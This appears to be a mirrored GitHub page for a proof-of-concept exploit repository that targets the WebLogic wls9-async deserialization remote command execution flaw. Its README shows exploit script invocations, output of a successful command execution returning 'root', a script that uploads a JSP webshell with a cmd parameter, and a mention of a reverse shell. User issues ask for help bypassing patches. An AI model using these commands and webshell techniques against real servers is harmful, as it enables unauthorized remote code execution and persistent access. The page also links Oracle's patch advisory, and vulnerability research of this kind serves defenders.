Light

jas502n / cnvd-c-2019-48814 Goto Github PK

View Code? Open in Web Editor NEW

244.0 10.0 97.0 5.49 MB

WebLogic wls9-async反序列化远程命令执行漏洞

Python 99.55% Shell 0.45%

cnvd-c-2019-48814's Introduction

CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞

回显poc for weblogic

Patch update:


https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

漏洞复现：

http://10.10.20.166:7001/_async/AsyncResponseService

curl -i http://10.10.20.166:7001/_async/favicon.ico

CNVD-C-2019-48814 Video

python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

Use RMI

CVE-2017-10271 No pactch

windows-linux-webshell

upadte: 自定义webshell名字，适用于windows or linux upload webshell

python async_webshell-all.py  http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

resever_shell

command see

webshell

cnvd-c-2019-48814's People

Contributors

Stargazers

Watchers

Forkers

harry1080 jiangsi520 0c0c0f uyid shad0w008 rockmelodies lh-413x aqqdgyz forlin getcode2git yuhuating listenquiet 5icorgi 1337g peterpeter228 c0d1007 f8syw5v chenq1 raystyle cjjduck icysun jimdx binddns caochenye yizhimanpadewoniu 734186915 sha-512 hatjie getyu flamingo-gx sasqwatch djhohnstein kbahaxor qsdj a11en4 yaozg vineshchauhan24 deadmanindia hoolign ydnzol choutofu aekras1a tinsyner cclauss keystroke95 arongmh tyekrgk c0010 dawson0x00 chaceshadow lxkxc idkwim mthq imklever greatspider135 cl0udbreak aklmtst grglzrv m4tth2w 0xsb modulexcite lijianbang xiaoyinchong kisbuddy chunbai123 doge-dog jerrynotme bailongwang1 a105455 iceshijie 0x6b7966 attackgithub lanpan999 traxsw rafi693 xuandaoren hotitanxiao sry309 pikaqi lin962648 uuuunotfound omiter lookmycookie tounsi007 5l1v3r1 leba0 yekainew lokicomesback lczgywzyy jackchan1024 want2live233 skinnyshy jeromeyoung baozhazhizi elijahahianyo

cnvd-c-2019-48814's Issues

python

where is python code?

The problem cannot be reproduced after installing Weblogic PSU171017

My environment has PSU171017 and higher installed, and I tried your POC but found the problem cannot be reproduced.
Do you have any other POC that works?

x

x

JRMP (RMI) support with instructions

Hi,

Do you think it would be possible to add support for JRMP Listener (RMI) with instructions please?

Thanks a lot for sharing your knowledge with the community @jas502n :)

async bug; CVE-2017-10271 BYPASS

Hi,

I tried to modify the CVE-2017-10271 PoC for the async bug without success :( Could you please guide me on how to get the WebLogic server to connect and interact with the JRMP Listener please?

Any help would be very appreciated,

Thanks :)

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.